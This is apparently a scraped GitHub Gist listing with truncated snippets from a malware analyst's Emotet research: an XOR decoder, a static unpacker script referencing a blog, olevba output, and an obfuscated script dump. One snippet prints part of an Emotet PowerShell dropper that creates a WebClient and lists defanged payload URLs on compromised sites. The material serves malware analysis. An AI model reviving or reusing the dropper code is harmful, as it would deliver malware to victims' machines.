This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import binascii | |
from itertools import cycle | |
SERVER_RESPONSE_FIE = "server_response.txt" | |
XOR_KEY = b"ZKkz8PH0" | |
with open(SERVER_RESPONSE_FIE) as serverfd: | |
resp_str = serverfd.read() | |
resp_str = resp_str[::-1] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$jrFhA0='Wf1rHz' | |
$uUMMLI = '284' | |
$iBtj49N='ThMqW8s0' | |
$FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe' | |
$S9GzRstM='EFCwnlGz' | |
$u8UAr3=&('new-object') NeT.wEBClIEnt | |
$pLjBqINE='http[:]//blockchainjoblist[.]com/wp-admin/014080/ | |
@ https[:]//womenempowermentpakistan[.]com/wp-admin/paba5q52/ | |
@ https[:]//atnimanvilla[.]com/wp-content/073735/ | |
@ https[:]//yeuquynhnhai[.]com/upload/41830/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Name: | |
# unpack_emotet.py | |
# Description: | |
# This script accompanies my blog at | |
# https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/ | |
# and can be used to statically unpack given sample in the blog | |
# Author: | |
# https://twitter.com/mirshadx | |
# https://www.linkedin.com/in/irshad-muhammad-3020b0a5/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: emotet.doc | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls | |
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
(empty macro) | |
------------------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ olevba.exe charge_07.20.doc | |
olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: charge_07.20.doc | |
Type: OpenXML | |
Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'. | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls | |
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
29$A3560804E16 = A2B00000233($OS[1]), $A4B60A04F1C = A2B00000233($OS[2]), $A3A60C03143 = A2B00000233($OS[3]), $A3360E01054 = A2B00000233($OS[4]), $A1070005C36 = A2B00000233($OS[5]), $A2C70204F5F = A2B00000233($OS[6]), $A5A7040361D = A2B00000233($OS[7]), $A5870605460 = A2B00000233($OS[8]), $A567080112D = A2B00000233($OS[9]), $A5670D0410E = A2B00000233($OS[10]), $A5E80205900 = A2B00000233($OS[11]), $A4580403500 = A2B00000233($OS[12]), $A5D80603E25 = A2B00000233($OS[13]), $A3580801732 = A2B00000233($OS[14]), $A5480A0022D = A2B00000233($OS[15]), $A2F80C00D40 = A2B00000233($OS[16]), $A2580E03701 = A2B00000233($OS[17]), $A639000454B = A2B00000233($OS[18]), $A0E90203930 = A2B00000233($OS[19]), $A5990405F41 = A2B00000233($OS[20]), $A0C9060335F = A2B00000233($OS[21]), $A079080083C = A2B00000233($OS[22]), $A3690A02A2A = A2B00000233($OS[23]), $A5890C04F61 = A2B00000233($OS[24]), $A1590E03C19 = A2B00000233($OS[25]), $A54A0002952 = A2B00000233($OS[26]), $A07A0201025 = A2B00000233($OS[27]), $A2DA0400532 = A2B00000233($OS[2 |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
kg download -u <username> -p <password> -c planet-understanding-the-amazon-from-space |